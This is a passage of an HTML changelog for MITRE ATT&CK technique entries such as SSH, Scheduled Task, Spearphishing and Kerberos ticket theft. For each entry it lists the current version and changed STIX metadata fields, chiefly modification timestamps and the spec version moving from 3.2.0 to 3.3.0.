collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:45.700000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1021.004] Remote Services: SSH</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:34.985000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1098.004] Account Manipulation: SSH Authorized Keys</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:55.005000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.017] Obfuscated Files or Information: SVG Smuggling</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:22:02.298000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1688] Safe Mode Boot</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:48:52.409000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1595.001] Active Scanning: Scanning IP Blocks</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:28.603000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1053.005] Scheduled Task/Job: Scheduled Task</h4><p><b>Current version</b>: 1.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:19.176000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.618000+00:00</td></tr></tbody></table></details><hr><h4>[T1053] Scheduled Task/Job</h4><p><b>Current version</b>: 2.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-06 13:58:22.807000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr></tbody></table></details><hr><h4>[T1113] Screen Capture</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:19.886000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1593] Search Open Websites/Domains</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:10.188000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1003.002] OS Credential Dumping: Security Account Manager</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:26.545000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1518.001] Software Discovery: Security Software Discovery</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:23.401000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1679] Selective Exclusion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:32:31.453000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1583.004] Acquire Infrastructure: Server</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:50.911000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1584.004] Compromise Infrastructure: Server</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:30.616000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1569.002] System Services: Service Execution</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:35.506000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1489] Service Stop</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:30.688000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.010] Hijack Execution Flow: Services File Permissions Weakness</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:02:37.539000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:02:58.258000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:52:13.675000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.639000+00:00</td></tr></tbody></table></details><hr><h4>[T1213.002] Data from Information Repositories: Sharepoint</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:22.832000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1684] Social Engineering</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 15:39:55.218000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1585.001] Establish Accounts: Social Media Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:14.364000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1205.002] Traffic Signaling: Socket Filters</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:45:22.463000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr></tbody></table></details><hr><h4>[T1592.002] Gather Victim Host Information: Software</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:17.631000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.710000+00:00</td></tr></tbody></table></details><hr><h4>[T1072] Software Deployment Tools</h4><p><b>Current version</b>: 3.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:06.595000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1518] Software Discovery</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:31.671000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.002] Obfuscated Files or Information: Software Packing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:15:31.610000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.006] Masquerading: Space after Filename</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:41:09.462000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1566.001] Phishing: Spearphishing Attachment</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:35.522000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1598.003] Phishing for Information: Spearphishing Link</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:34.880000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1566.002] Phishing: Spearphishing Link</h4><p><b>Current version</b>: 2.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:34.123000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1598.004] Phishing for Information: Spearphishing Voice</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:07:06.553000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr></tbody></table></details><hr><h4>[T1566.004] Phishing: Spearphishing Voice</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:04:48.737000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.711000+00:00</td></tr></tbody></table></details><hr><h4>[T1132.001] Data Encoding: Standard Encoding</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:20.938000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1528] Steal Application Access Token</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:04.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.694000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1539] Steal Web Session Cookie</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:25.272000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1558] Steal or Forge Kerberos Tickets</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:41.885000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.003] Obfuscated Files or Information: 